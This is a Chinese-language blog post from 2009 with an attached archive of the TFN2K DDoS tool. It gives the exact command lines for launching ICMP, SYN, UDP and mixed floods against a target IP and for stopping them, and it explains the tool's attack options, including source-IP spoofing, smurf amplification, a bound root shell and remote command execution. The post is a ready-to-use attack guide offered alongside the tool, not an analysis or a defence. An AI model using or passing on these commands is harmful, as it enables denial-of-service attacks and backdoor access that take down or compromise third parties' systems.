Chinaunix首页 | 论坛 | 博客
  • 博客访问: 509403
  • 博文数量: 110
  • 博客积分: 3971
  • 博客等级: 中校
  • 技术积分: 1175
  • 用 户 组: 普通用户
  • 注册时间: 2006-06-20 23:27
文章分类

全部博文(110)

文章存档

2015年(2)

2014年(1)

2013年(1)

2011年(9)

2010年(28)

2009年(12)

2008年(13)

2007年(23)

2006年(21)

我的朋友

分类: WINDOWS

2009-07-31 10:27:26

文件: tfn2koptimize.rar
大小: 27KB
下载: 下载
先來ICMP攻擊
#./tfn -f hosts.txt -c 6 -i 192.168.111.88(十分鐘,192.168.111.88就死機了)
重啟,接著測試。。。

SYN/TCP攻擊:
#./tfn -f hosts.txt -c 5 -i 192.168.111.88 -p 80
UDP攻擊:

#./tfn -f hosts.txt -c 4 -i 192.168.111.88

ICMP/TCP/UDP輪流攻擊:

#./tfn -f hosts.txt -c 8 -i 192.168.111.88
 

5。攻擊結束
    如果我們想停止攻擊:
#./tfn -f host.txt -c 0
實際tfn還有許多攻擊選項,大家可以再回頭看我的第一篇文章,看一下-c面的11個選項。
缺省的命令是通過殺死所有的子線程停止攻擊。命令一般用-c .
請看下面的命令行描述。 選項-i需要給命令一個值,分析目標主機字符串,這個目標主機字符串缺省用分界符@。
當使用smurf flood時,只有第一個是被攻擊主機,其余被用直接廣播。
ID 1 -反欺騙級:服務器產生的DoS攻擊總是來源虛假的源地址。通過這個命令,你可以控制IP地址的哪些部分是虛假的,哪些部分是真實的IP。
ID 2 -改變包尺寸:缺省的ICMP/8,smurf,udp攻擊缺省使用最小包。你可以通過改變每個包的有效載荷的字節增加它的大小。
ID 3 - 綁定root shell:啟動一個會話服務,然你連接一個指定端口就可以得到一個root shell。
ID 4 - UDP flood 攻擊:這個攻擊是利用這樣一個事實:每個udp包被送往一個關閉的端口,這樣就會有一個ICMP不可到達的信息返回,增加了攻擊的能力。
ID5 - SYN flood 攻擊:這個攻擊有規律的送虛假的連接請求。結果會是目標端口拒絕服務,添瞞TCP連接表,通過對不存在主機的TCP/RST響應增加攻擊潛力。
ID 6 - ICMP響應(ping)攻擊:這個攻擊發送虛假地址的ping請求,目標主機會回送相同大小的響應包。
ID 7 - SMURF 攻擊:用目標主機的地址發送ping請求以廣播擴大,這樣目標主機將得到回復一個多倍的回復。
ID 8 - MIX攻擊:按照1:1:1的關系交替的發送udp,syn,icmp包,這樣就可以對付路由器,其它包轉發設備,NIDS,sniffers等。
ID 9 -TARGA3攻擊
ID 10 - 遠程命令執行:給予單路在服務器上執行大量遠程命令的機會。更復雜的用法請看4.1節。
更多的選項請看命令行幫助。


阅读(1548) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~